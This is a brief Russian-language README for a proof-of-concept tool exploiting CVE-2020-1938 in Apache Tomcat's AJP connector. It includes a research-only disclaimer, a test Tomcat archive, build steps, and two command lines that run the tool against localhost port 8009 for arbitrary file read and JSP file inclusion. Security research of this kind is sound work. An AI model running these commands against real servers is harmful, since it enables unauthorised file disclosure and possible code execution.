
CVE-2020-1938
Инструмент предназначен только для исследований в области безопасности и внутренних проверок. Запрещается использовать инструмент для незаконных атак. Ответственность за последствия несёт пользователь.

apache-tomcat-8.5.32.zip — тестовый tomcat
Произвольное чтение файлов
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Включение файлов
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Способ сборки: в каталоге tomcat/ajp-bug Выполните mvn clean compile assembly:assembly